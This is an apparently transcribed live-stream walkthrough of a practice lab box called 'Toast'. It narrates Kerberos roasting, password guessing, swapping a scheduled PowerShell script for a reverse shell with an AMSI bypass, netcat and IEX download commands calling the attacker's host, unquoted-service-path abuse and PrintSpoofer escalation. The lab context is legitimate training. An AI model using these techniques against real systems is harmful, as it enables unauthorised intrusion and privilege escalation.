So we are back with toast, which this one, that's that green means easy, blue's medium, red's hard. I think this one's like the hardest one on here or something. Look at info. See if it says anything about it. I've heard that supposedly this one's the hardest one on here, so we'll try this guy out. We'll see what happens. And yeah, we'll go from there. Let's go ahead and start up the video here. Oh, it already started recording. Never mind. I'm quick. Quick like that. Alright, let's go ahead and exit out of all these guys. Exit out of here. Clear that out. CD in the desktop. Desktop, Cybersec Labs. And we'll go ahead and we'll make a directory for toast. CD in a toast. And let's go ahead and start up an map scan on him. And let's see what we got here. SMB client. TAC L. Oh, there's definitely a space in there. Let's get rid of those. See if we do anything with that. Oh, we can. Okay, we got users. Okay, so we can get in there. Let's go into users. See what we got here. Default public. Let's try public. Count pictures. Nothing in there. CD and documents. Nothing in there. Nope. Okay. Let's go ahead and back out of public. Let's go ahead and CD and default. Default user shouldn't have anything in there. So I thought. Nothing there. CD and app data. Okay, nothing. Go ahead and exit out of here. And we'll look at that again. See what else was open. There's quite a few things open in there, so usually just the first one I saw. And now we can't get back into it. Good. That's what I see. Alright. Let's go. Alright, good. Now it's it broke. Alright, there we go. Potato and Karen. So we know we have a Karen. So let's go ahead and nano users.txt. Then we got a Karen. Let's go ahead and go into potato. Then we'll try Karen after that. Nope, can't go in there. Okay. Let's try Karen. Nothing in there. Okay. So we know we at least have a Karen so far. Last one we had to actually spray for usernames. And I'm wondering if we got to do that same bowl again. Spray for usernames. So we might as well start up a curve brute just in case. And throw it at it with the same 10 million damn usernames. So let's do a period slash curve brute or whatever it was. It was in. Yep. Let's go ahead and do that again. I think I actually have. Hey, thanks a lot for the follow, Callum. I think I actually kept a little thing in there too. Yeah, I did. Kerbero's username spray. So let's go ahead and spray it again. All across 8. And this one's called Toast, right? What were the threads with that? Did I put threads in there? No, I did not. Let's go ahead and do attack T. Let's try 200 this time. Last time we did 100. Let's try 200. Same in the correct, yes, correct domain controller. 172, 3.8, yeah. Doesn't seem to like 200. Let's try 100. The box may not be fully started up yet also. Stretch. Oh, man. I don't think the box is fully started up yet. I think we're actually killing it. So definitely did not test all those that quickly. And we're also using names.txt. We were going to use the 10 million. So Karen's just a douche. She doesn't... Okay, cool. So let's grab her stuff. Potato was a user. Okay. So let's go ahead and do a nano hash.txt. John hash.txt. Fork equals 4. We'll use rock you. Hopefully we get something out of that. We got another one like right here too. Why is it a different hash? Why is it a different hash on each of those ones? If it's the same person. Should be the same password. Well, I think it would have been the same password. That's strange. Very, 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 very strange. And we're not cracking them also. Why are we not cracking any of them? That is strange. Why can we not crack either of those two? Hash1.txt. John hash1.txt. Wordless equals user share wordless rocky.txt. Someone changed the password? Does that have to be reset already? Has it not been reset in 2 months? So we're just not able to crack either of those two, huh? When was the last time this thing was reset? 2 weeks and 2 days ago. Let's reset it then. I feel like that's our way in, like right there. Let's go ahead and grab these usernames like real quick. Well, we already have them. So let's go and do a nano users.txt. We have Karen, Potato, and that's it. Administrator. And then that's it. Okay. And let's reset this guy right here. He's already resetting, never mind. Because I don't understand, why would we get that if we can't? Like, why would we receive that if it's not going to do anything for us? You know? So I'm kind of confused about. Well, let's give this guy a minute to actually start up. I'm going to go pee like real quick. We'll give this guy a minute to actually start up, and then we'll fucking come back and try that again. I feel like those should have cracked, but we'll see. Alright. Let's see if this ASREP roasting works again. So we got that. See if we get 2 passwords again also. That are different hashes. Or different types of hashes. And we do. Not even different types. I don't know why John was saying that. Nothing. Should be able to crack those pretty much immediately. So that's what I'm kind of confused about. Is why we have those and not be able to crack them. Nothing. Her name is Karen. Her name is Karen. I'm thinking it has to do something with the manager. This is what I'm thinking, like right there. You never know. What if we're just getting the wrong damn... What if those are just old? Like, we'll keep it like that, and then maybe once we get the users... We'll do an actual get MP users. You know what I'm saying? Let's try that. Let's do a get MP users. So we got some users in here, right? So let's try to do a get MP users .py. And we'll do this for, it should be called toast .csl slash, from there it's going to be freaking Karen. Attack no pass. I definitely need to put in attack DCIP. And we definitely need an IP address here, huh? And we got a different one. This one's a 23 this time. Okay. It was I crushed it. All right, manager. Okay. SMB client tech L. Well, let's do a crack map exec first. Make sure that actually works. And we're gonna do tech U Karen tech P manager. For 3.8, right? Okay, that's good. Let's go ahead and do a nano or echo Karen manager into user pass.text. I was like, well, her name is Karen. Maybe it's manager. Sure as shit, manager. All right, cool. Let's go ahead and can we evil win RM as her? Can we like get in as her? Just be done with her? See if she can see anything. .8, name is Karen. Okay, she can't even win RM in. She can probably get into Karen though, right? That's what I would think. She should be able to get into Karen, I would think. So let's go ahead and do that. Well, I'll put in the password. And BIR in there. And we can't. So she can't get into Karen for some reason, even though she is Karen. Okay? Doesn't really make more sense. But let's try potato. Don't know why she'd be able to get into potato, but hey. Okay, she can get into potato, but not Karen. And I don't ask questions. Get clear logs. Let's go ahead and cat clear logs. Okay, this is obviously running something like a scheduled task, and it's clearing out the logs, obviously. So I'm wondering if we can throw in, if we can put something called clear log, right? If we could throw it into there and have it call back to us. That's just what I'm thinking, like right there. Let's go ahead and try a CD into tools. And let's go ahead and copy over, I don't know why I even CD into tools, see back in the desktop, CyberSec Labs, toast. Let's go ahead and copy from tools, invoke PowerShell, TCP ex.ps1. It's right here. Let's go ahead and cat that guy, just to make sure that he looks good. And he does. Let's go ahead and do an RL wrap. Let's actually do an MSF console. We'll catch him like that. And let's try to put this one into there. So let's go ahead and go back into SMB client. We'll do manager. And I want to put, we actually want to move that guy first. We want to rename him. So we're going to move invoke PowerShell TCP.ps1 to clear logs.ps1. So now if I cat clear logs.ps1, we're running that invoke PowerShell TCP. Use exploit multi-handler, set payload to Windows, shell, reverse TCP. Set our L host to ourselves, set our L ports 4444. Let's go ahead and run that up there. And let's go ahead and put that clear logs PS1 in there now. I can't. Can I delete clear logs? Denied. So I can't put it in there. How the hell am I going to do this? We need potatoes information first. How? Okay. How are we going to do this? Let's keep enumerating this then. I thought I found our way in already. I got excited. Let's keep enumerating this then. Let's go ahead and do an RPC client. 3.8. And this is going to be for Karen. And we will do manager. Enum dom users. Okay. Can we do an RPC dump? How about that? Or LDAP dump? I like LDAP domain dump, if you guys haven't noticed, because it show you like descriptions, things like that. So let's go ahead and do a Karen. Attack P is going to be manager. Nope, that did not work. Okay. All right. We should be able to look at descriptions within RPC client, I think. If we do a RPC client manager, I think it's display info. Do I have it on here? SMB, Linux, Redis. I have RPC somewhere in here. RPC client. Query user, query group. We can always just query the user of potato. And let's see if he has a description. Yes, he does. Sweet. Let's go. So we have potato and her password so far. Let's go ahead and echo. We had Karen. Do I already have a user pass.txt? Yes, I do. So let's go ahead and echo potato. Into user pass.txt. Was it the wrong IP? Okay, let me look at that again then. You're 100% correct. Thank you very much. Let's see if we get that. Nope. Doesn't usually work. I will say that. But when it does work, it works great. All right, let's go ahead and exit out of there. Now we should be able to get a potato with the password we just got. And now we should be able to delete clear logs and put our clear logs. This guy's still running. And it's obviously ours. It's much bigger. So there we go. Okay. So now we just kind of wait for a callback, I think. I hope. That's what we're going to do, is we're just going to wait for a damn callback. I don't know how it's actually going to run now that I'm thinking about it. Hey, thanks a lot for the follow, Virarjuli. Think I got that? How do I get so many boxes in a row? Have you encountered AV yet? We encountered AV on the, well, we encountered AMSI on the last one. We have yet to encounter AV. It's because I don't get up and leave. The Windows ones were pretty easy. The Windows ones were super quick. They were pretty easy. Well, I'm wondering is if AMSI is on this thing. And if it is, we may have to... I've never done this before with something like this. But what I'm thinking is we just throw this guy in at the bottom and then tell it to do the rest of that. Something like that. And let's try to put it in there. Hopefully that does something. I don't know if that'll even work. Right there. I think that'll just break it. Huh. Well, the fireworks are going off. Every Saturday. Iron Man, thanks for subscribing on YouTube. I don't know if that will actually work. I don't think it will. How are we going to get that guy to run? Because we have yet to encounter antivirus, but that should have ran by now. Oh, God. Okay. How can we... What if we just have it download a file? Then how are we going to get to run that file? There's no antivirus on the box. There's only AMSI. We might be able to do something like... Let's see here. We might actually be able to do something with this. There's only... Let's try this. Let's see if that actually runs all the way down to there. And we'll make a quick file over here. We'll see if that actually runs. Obfuscate the reverse shell. Yeah, we're putting it in memory like right now. That'll be a lot of obfuscation for this thing. I want to see if it's antivirus. I want to see if it calls back to me first. That's what I really want to see first. Isn't even going to call back to me. Does this, what I think is happening, actually exist? That's kind of what I want to see. Like right now. Because if we get a callback up here, then we know it's at least going through the whole thing. And we know how long it takes. But in like a minute or two, if we don't get a call back, not really much. We're going to have to obfuscate that whole damn thing just to be able to run a reverse shell. Okay, you know what we might have to do? Is the AMSI... If I put this guy into a PS1 file. No. Let's go ahead and look up. Hey, thanks a lot for the follow, U1476. So I'm thinking... If we can run this with IEX IWR. Right? We can call for something like this. And then run another one right behind it. It should be within the same PowerShell. So if we go into clear logs, we should be running that in the same exact PowerShell as the other one. Right? And I'm thinking all we have to do is just actually do something like nano. Let's go ahead and move clear logs.ps1 back to invoke PowerShell TCP ex.ps1. Okay, Let's go ahead and make a nano clear logs.ps1. Do an IEX, IWR, use basic parsing, and we are going to get that one guy, what did I name him, bypass or something like that? We're going to get this bypass.ps1, or we could just try to just run .10.10.0.16, right? Slash bypass.ps1. Then I want to run IEX, IWR, use basic parsing, HTTP, 10.10.0.16, invoke PowerShell, TCP, ex.ps1. Think it's something maybe like that. Now let's put clear logs into there. Let's go ahead and cd into tools. Or actually, that's all in toast. Cd back into toast. And let's go ahead and put clear logs back into it. What ports are open? Right now, SMB, nothing, just normal ports. SMB, RDP, 5985, LDAP, and that's it. So just kind of your normal stuff that's open. And this is being ran. I know that much. That has to be being ran every however often because of what it was running. Okay, so we know it got it. It came back to us, and it got it, right? Now, we just need to figure out this AMSI bypass, really. And I don't think I can just throw this on the top of... on the top of here. I don't think I can just throw this in here. What's up, Oreo? It's got it again, so we know what's happening pretty much every minute. Let's try that, like right there. I just threw them in there. It's going to come back to grab it. If AB is enabled, what if you make a new user with admin privilege instead of reverse shell and log in? We could try to make a new user. That might work. Well, we don't know who this user is. We don't know if they have admin privileges. I'm going to go with they do not. Because right now, we're just a local user as far as I know. So we probably can't make a new user. We could try. We can 100% try. But I don't think we can make a new user. I'm thinking instead of invoke PowerShell TCP, I'm thinking we do a wget for netcat. And then have PowerShell run netcat. Because netcat a lot of times, like, it put in a C Windows temp. Let's try something like, okay, just got it again. So we just pulled him again. We didn't get anything back though. I don't think that that bypass like that works like that. Let's try. I'm thinking You never know. Just throw it in there and see what happens. And you never know. Just grab this guy right here, so I might have to wait till the second time around. We'll work here. Oh. You know what we may be able to do? Let me see this guy real quick. I want to try something. May just be able to do something like that. You never know. May just be able to try something like that. It may work. I don't think I need that. I won't need that bypass after that. So we're going to get rid of that. That's just that much more. I know there's also a deal. Oh, let's fucking go! That's how you do it! That's how you freaking bypass AMSI. Let's fucking go! Oh my god. Look at that, HunterBot. That's how you freaking do it. Wow. I don't know why that one just got shelled out here. Oh, probably because that was like the newest one that I just put in there. No! Why did you close? No! Stop doing stuff. What was my last clear logs? No. Why are you closing? No. Did it just get that shell.exe? Did it just run that? No, because we would have got something different up here, huh? It would have been like, you can't run. I wonder what it just got. Let's go ahead and give it a minute. We'll see if it comes back to us again. Might have been Defender. The shell.exe, yeah, it does exist over here, right? But we didn't even like call for it yet, so it definitely wasn't that. It was definitely whatever this last one was like right here that we did. We just gotta wait for it to do its newest one. It's not supposed to look like that. Whoops, definitely not supposed to do that either. Supposed to look like this, like right here, I think. All right, let's try that one more time. I can't believe that even worked in the first place. I think I might have broke this guy. feel like we might have broken him. I got another idea. Why are we trying to do this? Why are we trying to get a callback? I don't know if we can crack his password or not. But why don't we just try to do like a copy this, because we know that's there, into 10.10.0.16/share. Why don't we just do that? Now it's going to try to copy it, right, over to our share, and we'll have responder set up. But he's not even calling back anymore. I think we broke him. Or I broke what I was doing to him. Let's go and let responder do it for like a minute. Because I definitely put... I can always just Control Z a couple times. Ending with double quotes? No. What do you mean? Or are we just going to get back his hash? We're probably just going to get back the guy that we already have hash, huh? I think we broke it. Damn. I wonder if it was that one that worked. I wonder which one worked. It's probably this one like right here that worked, huh? So it's probably this one like right here that actually worked. So let's go ahead and just throw the AMSI bypass in there again. Because that seemed to be the one that actually worked, like right there. This way is probably a lot faster to do it like this. I think it was probably this one that worked from just when everything started coming through and stuff. Just go and save that. I'll try to put him back. So obviously he's a little bit bigger now. We got a callback at one point though. I wonder if he's broke. Let's try to put a ping into him, and we'll see what we get with that ping. Hey, thanks a lot for follow, EOE. No. Okay, we got something there. He's still trying to get that shell.exe also. Why are you still trying to get that? Okay, we got another callback. Okay, so that one works. Okay, we are in. Can I do that? Is he going to run again and kick me out? That's what I'm wondering now. So we know which one works at least. Okay, we got one of them. We got one of the flags so far. Let's freaking go. Cares about flat right now, actually. Okay, so we're only able to stay in there for so long, it seems like. We need to get a file into there quick and go from there. So let's go ahead and run this again. We need to get something else into there, like a netcat listener or something, and go from there. And then it would be nc.exe tac-c, right? Or tac-e command. Every time we get on here, we can do a little bit more to them. User slash potato. Desktop. Can we do that? nc tac-e, right? 10, 10, 0, 16, 1, 2, 3, 4. Is that it? First off, that's not even close. So it would have to be nc.exe no matter what. Tac-e. Is that it? That's all I need, like right there. Damn. Okay. We should nc tac-e command. So I need nc tac-e command. Okay. Oh, we already got a callback. We need to move fast again. CD into the C drive, users, potato, desktop. Let's go and copy this. And tac-exe, I messed it up again. Can't do it because I'm in invoke PowerShell. Shit. Okay. So he's on there now at least, right? What if I do a DR here? What's in here? Okay. We need, I think, to upload netcat, maybe? Or maybe just call for it now? Because netcat's on there now, right? So let's go ahead and do a nano. Let's go ahead and move clear logs back. Clear logs.ps1 to clear logs ps1.back. And then we're going to do a nano clear logs.ps1. And then we're going to do a we're going to do a C potato, C users, potato. How do you get reverse shell in the background for Windows again? Like Control Z in the background? What do you mean? Oh, I don't, never done anything like that. To get run like that, I've never done anything. I don't know if it can be. These fries are disgustingly cold. I think what the problem is, I don't think it's AV kicking me out. I think it's whenever this guy runs again. And then I think it's just how Invoke PowerShell works. Because it's not really the best shell. So that's what I'm trying to do a netcat listener on there. But that doesn't seem to be really working for me out too well now, does it? What if we do a command prompt? Yeah, the initiating reverse shell, not really the best shell ever. Like, once you get on it, you can't really do too much else on it because it's already taking stuff up. So to make another reverse shell off that reverse shell usually doesn't work. That's probably why netcat wasn't working. Even when I got the command correct. That's why it probably wasn't working, because it doesn't allow for, like, other reverse shells to be made off that shell. It's weird. It has to, like, call back to, like, its own netcat shell out, or its own power shell. It's weird. Thanks for the follow, Disket. At least that's the problems that I've always had with it. I don't know if there's like a good like bypass for it or something. But let's see if we can run netcat. Or have command prompt go back and get netcat for us. That's not working, like right there. Maybe afterwards just delete it out of there? After we get that callback, just delete it? Maybe that'll stop it from doing whatever it's doing? Because netcat's not getting a reverse shell in here. So it's not going into command prompt most likely. Or it's seeing that that thing's actually on disk. So let's go ahead and remove tech RF. Move clear to that. Let's go ahead and put that again. Maybe we'll just delete it. Maybe if it doesn't run again, then we'll be good. We got it over here. Okay, there we go. Let's try to delete it. I'm not seeing any weird groups made down here. Not at the very top. Everything's pretty normal in there. He's a domain. He's got remote management. He doesn't have a description. Who are we? We are Potato, right? God damn, that's not it either. We were potato, right? I believe. Always helps thinking. Huh. Okay. Keep getting kicked out. Every time we do it, we get kicked out of the thing. Yeah, that really sucks. I don't think he's gonna execute that cat. I just don't think it's gonna happen. All right, let's go ahead and maybe it's just one step at a time, you know? Maybe he's gotta move slowly throughout it. Gotta figure out something here because it keeps kicking me out. Why do you kick me out? Why do you hate me? Okay. That should be the share now. Alright, so at least we got netcat of the share now. So now we don't need to try go somewhere else to call it. Got something named purgatory here. Okay. Let's go. Alright, let's see if we can get this guy just to what do I call it? nc.exe? It should be like that, right? I think it should be just like that. I think that should be it. Then C tac E. See? It always helps you think better. So just be something like that. Something easy like that. I'm 100% messing up the thing. That's probably why. Tech E, that's why. I'm 100% messing it up. See if that works. I want to see if it calls back to me at all. If it does anything at all back to me. It's 3.8. Oh, I need to, if it's kicking out Invo PowerShell and memory, nah, the interpreter Metasploit file is never going to get by it. If it's kicking out memory, we're not getting by that guy. I feel like we should have gotten something with that. I really, really feel like we should have gotten something with that, like right there. Okay. We know that thing runs from shares, right? Let's get a callback and try to run it now from shares. Let's try to do that. All right. Let's go ahead and let's go ahead and put that back. Because we know it's running files from share. We know we can do that. So maybe we just can't run files from wherever the hell we want. I have no idea. I don't know. I know it's a 64-bit something. I don't know what else. Let's go. There we go. We know it's running in shares. There we go. We finally have something that we can work with here. CD into C drive. Let's freaking go. CD into program files. CD into purgatory. CD into up for challenge. Welcome to hell.exe. Notice that? Up for challenge? Anyone think of what that might be? Just don't hit Control C. Oh, I will. I will. Hey, can anyone... Hey, let's see if you guys' minds are going the same way that I am. With up for challenge. Anyone tell me what they think this might be? I wonder if I could do a PowerShell in here. We might be in Control C here in a minute. Nope, we can. Okay. I'm going to take that as a no. Up for challenge has a lot of spaces in it, right? If it's not quoted, it's an unquoted service path. That's wherever my mind's going like right now. We're going to grab the other one. Power up, execute. I want that one, yep. In case we do actually get put in in case this isn't like a real good PowerShell, I want that. Okay, what we got here? Okay, so it's good enough to tell me that. Use basic parsing. See if it catches it. Might have to do an AMSI bypass, which that'll be okay. Okay, AMSI bypass. Let's try it again. Let's freaking go! One of the very first things that it looks at also is thing that we don't have permission to is unquoted service path. I think it's unquoted service path. We don't have permission to look at it, but we have freaking... Oh, how do you look at... No, we won't be able to look at it anyways. What was it called? Welcome to Hell or something like that? It's called Hell. Welcome. What's this thing called? 2? One of these things has to be running. We have to be able to see how to restart this service. All right. Is WinP's going to work on here? Probably not. Can I do this? This would be really funny if I could do this. Preference. Disable real-time monitoring to true. Can I do that? No. Okay. Permission denied. That's what I figured. All right. Let's do a wget. Let's see if we can do it. Let's cd back into C Windows temp maybe. Let's cd into shares potato. So we know we can run stuff from there. Let's go ahead and do a... We're in tools. Like, are we in tools? Yeah, we're in tools. Okay. Let's try to grab... I don't think it's going to work. Is there a WinP's PowerShell script? Invoke WinP's. There sure as fuck is. Let's go. Hey, thanks a lot for the follow, Vimmer. Did they actually take it? We might be in Control C. Oh, wow. Actually took it. Okay. OAV was detected. Potato has full access to that. Damn, that would have been nice to see. Lost for that cat. That's for win peas. Had to restart service for that guy. There we go. Hell Escape is the service. Welcome to Hell. No quotes is space detected. File permissions. We can write, create files. Possible DLL hijacking for Hell Escape. Let's frickin' go. We can probably do an unquoted service path. No quotes. Space detected. Service called Hell Escape. We just gotta see if we can start and stop that service now. Okay, let's go. Clear logs. Make sure there's nothing on the inside that we need to see from the outside. Doesn't look like it. Except for all the UDP stuff, which that's great and all. Only so much we can do with that. What's up, Frank? How you doing? What we just did to get into this machine was on a freaking another level. I feel like, at least. I don't know, Oreo probably like, nah, shut up, Pogue. No firewall. So it's really just AMSI on here then. Okay, so we got that service. And that is called Hell Escape, right? Let's go ahead and go back into command prompt. SCQC Hell Escape. SC query Hell Escape. Is it actually all caps? Can we stop it then? Okay, I'm not in command prompt. Maybe that's why. Didn't actually put me in command prompt, did it? Command. Command. Oh, God. Stop service. Hell Escape? That's not it. It's... I feel like something happened. Whenever we ran that. And we're stuck. Stop service. PowerShell. Stop service. Yeah, it should be just stop service. Then it might be service name though, like tac name. Yeah, tac name. Okay. Stop service tac name. So we're gonna do stop service tac name Hell Escape. Okay, we're gonna have to control C. We were stuck there. So let's run this guy again. We're stuck in that, but we know we gotta get to Hell Escape. Hydrate. Shit, dude, I ain't got no water. Give me a minute. Oh man, that's the worst possible time, Oreo. Oreo! Give me 1 second, Oreo. Shares, potato. netcat.exe, tech e command 10.10.0.16 4242. No, I didn't put the freaking period slash, and I'm in PowerShell. Literally what I do all day, and I didn't do it. 0.16 4242. Okay, I'll go 5 right now. God. I don't need water on me. Let's just get your shell here. Okay. We're in command prompt now. Let's go and do an SC query for hell escape. Okay. So it is stopped. And if we can query it, we can most likely mess with it. So let's go ahead and let's make a... I'm thinking we're going to... So what we got there? We had... What was that place called again? CD and C drive. Program files. CD into program files. CD into purgatory. And I think we can make it up.exe. So let's go ahead and make it up.exe. So let's do an MSF Venom. I'm going to try to do an interpreter. We are going to try it. Because it said that there's nothing else running on this thing except for, really, it seems like AMSI. Which really just seems like that was just to make it a pain in the ass to get to it in the beginning. Run that in the background. And we actually want to move shell.exe to up.exe. And let's go ahead and do a... We're just going to download it in command prompt so we don't have to try to go back and forth. So let's download it in command prompt. Where's my command prompt download? Download from command prompt. There we go. Let's go and grab this. We'll throw this down here. And we're going to do a 10.10.016 slash up.exe. And we're going to call that up.exe. I think we should put it here. Access denied. Okay, CD. We got to be in the other one. Now let's try that again. I also need to create a Python server too. Shit. We could restart the service. How the hell are we going to get up.exe into there? Can we just copy it maybe? How the hell are we going to do that? Now I think about it. Bits admin? What's that, Oreo? Okay. Maybe we can't download it into there. Maybe we just can't download it anywhere. Maybe we have to download it in. Share. Potato. Access denied. Maybe it's just certain utils denied. Because we definitely downloaded stuff already, right? Now it doesn't want to go into PowerShell. No, why me? Oh, yes it does. Okay. Yeah, that's what I thought. Of course it does. Let's try to put it in here first. Error response. No such file. There isn't such file because I called it up.exe like this. That's why. That's 100% correct because we're on Linux. So that is correct. It's denied. Okay, so we can't download something in there, but let's say we can't copy something in there. C users or C shares potato. It's going a little bit better. Now let's go ahead and copy from C shares potato up.exe to right here. But it does. It was deleted. Okay. I think I have another idea. I think I do. It's in there. Whoopsie daisy. All right. Copy. See if this works. Let's see if that works, because that would be really funny. And I wonder if I could somehow call for it. Hey, thanks a lot for the follow, KK124. Okay, so we cannot get anything into there. To move it, yeah, we can't. Maybe we might be able to move it. We can't copy it, I know that much. Copy up.exe to here. I don't think we're going to be able to. Because we can't copy it in there. Why? Why me? It was 1111, was it? Nope, it was that. Okay. Okay. It's called up.exe now. All right. Okay, how are we going to do this? We can definitely do this. There's definitely a way to be able to do this. Obviously, but... Hey, thanks a lot for the follow. I am Zeus. Okay. So, we may be able to make, like, a PowerShell because we don't have... How are we going to get that guy over to there? It should actually be looking for it in purgatory. Yes. Okay, so now we have a netcat listener sitting in purgatory. Now we need to tell that netcat listener what the hell to do. Because that's not going to do anything for us like right now. Hey, thanks a lot for the follow. Human should go 117. Alright, now we just need to figure out how do we tell that file think it'll catch a net user file? Think it'll catch our own? We can't start the service though because that up.exe like right there is actually netcat. That's what that actually is. Netcat needs to know what to do once that service starts. That's the problem. Yeah, that's what I'm thinking. It's something like that. To be able to like, or if we can get okay. Does Windows actually look for .exe or is it just looking for up? And then it runs up. Because what I'm thinking is that we can literally just do the same thing we just did, except for this time, instead of calling it invoke expression or invoke TCP, we're just going to call it up. It already deleted anyways. Alright. I'm thinking we just need to move that to up.ps1. No. We need to actually cat this guy. We need to take pretty much all of this. We need to take everything. We take everything. And what we're going to do is we need a nano invoke PowerShell this guy. What the hell's going on there? Sublime invoke PowerShell. EX. The fuck? Where'd he go? Oh, he's not actually on there. We need to... We need to change this guy to be up. So let's file, save as, up. Yes. Now we need to actually mess with up because we don't want to call back the same thing we've already had to call back to. Nope, we need to actually mess with invoke PowerShell T speed up PS1. We actually need to mess with this one down here. We need to mess with him because he has to go to port, we'll say 1111 this time. And now he is going to be called. So let's go ahead and do a wget use basic parsing HTTP. Throw a Python web shell over here. Let's throw a reverse listener over here for 1111. Shit fuck. 2222. Just like I said, first try. And now he has to get clear logs. Nope. Up.ps1. Damn it, PowerShell. It's the same thing again. The fuck was that? Well, he called back to me, didn't he? Damn it. I didn't want him to call back to me yet. Okay, so he called back to me. So we know that will work. He calls back to me because I already have it running. But he shouldn't even have ran. Why did he even run, though? He needs to stop. He needs to go. Need to call for that file, like right there. Okay, you have that now. Now you need to run because he is going to be waiting for you, but I have to have him run right before. Okay. Go back into command prompt. SC start. What was it called again? Hell something? Hell escape. What? Service does not respond to start or control request in a timely manner. Service not been started. Then start. Well, that service sucks ass. I feel like we gotta do something like that. I don't know how yet. Okay. This is not going to be me. I don't know why I just did that. This is not going to be it, though. Yeah, I'm still potato. Alright. So let's... I wonder how it's grabbing that up. Oh, probably because it's going back here, reaching back there, and coming back in, huh? From the one that's still over here, huh? So let's... No, I'm not trying to install a service. I'm trying to get it to call for up.p. I was thinking if up.exe, if up.ps1 would make it go to .exe or whatever else. Hey, thanks a lot for the file, Mintel Rose. What if I... Can we do that? Will that still work? Okay, no, that one actually failed with an error. Okay, good. Okay, so that did not work. Okay. I think I need to actually compile something here. So we need to compile executable to run PowerShell. That's what we need to do. To convert a single PowerShell script to executable via command line requires a single line providing the main ps2.exe command, followed by the script's path to convert and the path to the executable we let you create. You can now run and it'll invoke the code to find the source. What? What? Is this a real module? ps2.exe? Can we just make it look like it's an executable? It's actually not. It's actually still a PowerShell? There's a PowerShell script like right here for it. Does it actually like tell me how to run it? So input file and output file. What the fuck? How do I call for it? What is the function? Like invoke what? Flash. What the hell was that thing called? That. Someone just got it. How the hell do we call for it? Yeah, but this is way more fun. How do we actually invoke it? Invoke ps2.exe. Okay. That's console executable. It wrote it as an executable. Is this actually going to work? forgot what the hell the service is called. Wonder why it's not even trying to start. That's kind of weird why it's not even trying to start, like right there. Okay. I think we're getting somewhere. Yeah, I'm wondering if that will actually work. That's what I'm wondering. What? For some reason, it just seems like it's not even trying to start the service, though. Usually, at least, like, freezes. That's like, yeah, I can't do that. Not like immediately just did not respond in a timely manner. You know what I'm saying? It's like, nope, can't do it. So that's why I'm kind of like, what the hell? Okay, let's look at that file again. What's happening here? I'm doing an AMSI bypass, right? And that's going to another AMSI bypass for some reason. That's going into here. I don't think I need that second AMSI bypass. Let's go ahead and try to get rid of as much crap as we can in that file. Although it is obviously working because it is calling back to me, but I guess we'll see if this one works also. Hey, thanks a lot for the file, Drake at 27. Let's see if this one works also. So we'll do back into PowerShell, run this again. Okay. Now, can we run... Does it still have the other guy in there? Hopefully we just roll up.exe. Alright. Let's start the listener up here. We're going to wait for everything to actually run. We're actually going to see if it'll actually call to, like... Alright, let's see here. Oh, what's up, B7H? How you doing? Alright, let's try doing SC start hell escape. That's not going to work anyways. We're on command prompt. Nothing. Why is it just immediately not respond in a timely manner? I feel like it should at least... No matter what, it doesn't respond in a timely manner. No matter what we do, it's broke as shit. I think I had it sitting on the wrong thing anyways. I have to have it in tools anyways. So let's go ahead and do a... Grab that again. We'll turn it into a binary somehow. I don't know how that's actually working right there. And then we will... We now have... Oh, where'd my up.exe go? Oh, I know. Now I gotta actually invoke it, right? Now we have an up.exe somehow. Don't know how, but we do. Now, let's do that. Batch command prompt. I really want to see this guy get a hit. He is not at all. All right. So he's not getting hit at all. We got to do something else. I guess it's time to do something else now. All right. How the hell do we do this? So... No, because the AMSI. No, because it's calling. It's working in other places. So... I wonder if it's messing with the executable, though. I don't think we're going to be able to run an MSF Venom. That's the thing, right? PowerShell reverse TCP, right? That's the thing. What is scarecrow time? I don't even know what that even means, Oreo. Well, AMSI shouldn't do anything with the executable. Shouldn't care about the executable. Let's go and try wget. Let's try to put this on the machine. I think as soon as it happens, it's going to be like, no. It's like the 5th time I've done that now. Damn it. It's also like the 3rd time I've done that now. I just think he's going to catch it. I think he's going to be like, yeah, good try, bud. It started that time. Oh, let's fucking go! Why didn't you say that in the beginning, Oreo? Jesus, we've been sitting here playing fucking dick grab for an hour. No, I was kidding. Let's go! Alright, now we're service user. Jesus, Oreo. Oh, the capitals, that one doesn't matter. With Windows capital letters, things like that, they don't matter. Watch, we can go back into, let's go ahead and CD back. We'll CD back into purgatory without a capital. If I can spell it. Purgatory. Yep. And it'll go like right in. Same thing with usernames. So if you have like all capital letters for your username, it doesn't matter. Just like a first letter of your username is capital, it doesn't matter. It's only the passwords that matter within Windows. All right. Now our service user. Good thinking, Oreo. Good freaking thinking. Although I really like to see that other one. Impersonate client. Let's freaking go. System info. Oh, we got system info. Okay, we got, what year is this thing? 2019. We are running print spoofer, I'm thinking. If we can get it on there, it might be like, hell no, brother. Nice try, brother. And we'll try to have it called back for netcat. Let's go ahead and throw that over here. I thought we got to compile a C# program. I was about to freaking get DZ on the line. Confused screaming. Yeah, I don't... That is true. There wasn't any Defender. I think I said that at the beginning, didn't I? I don't think Defender's on. It's just AMSI. Best basic training story. All right, I got a couple of them. All right. So, when you very first get to Marine Corps boot camp... Oh, I got to shut off 1 second because people can actually... All right, so we're going to put print spoofer on this guy. So we got wget use basic parsing, HTTP 10.10.0.16 / print spoofer.exe. Out file will be print spoofer.exe. Okay, so we got that on there now. Let's go ahead and copy this over. So we do have netcat and C shares and everything still. 10.0.0.16 on port 5555. Netcat. Let's do an RL wrap. Netcat 5555. We'll listen over there. Let's try to run this, see what happens. Please work. Oh, you know what? I'm in PowerShell. Let's go! We're the domain controller. Okay. Can we get in the users? That shouldn't happen. Are we done? Let's frickin' go. There we go. Supposedly the hardest one on CyberSec Labs. And we forgot to get a hash. Where's the other one? Yes, I did start recording. I did. Yeah, there is reverse shells. This one's one. We got 1, 2, 3, 4 reverse shells, all working off of, and they're literally all staying up because of one netcat and a PowerShell script. I actually don't know how this whole thing is working like right now. I kind of forgot. That only took 3 hours to do. Let's frickin' go.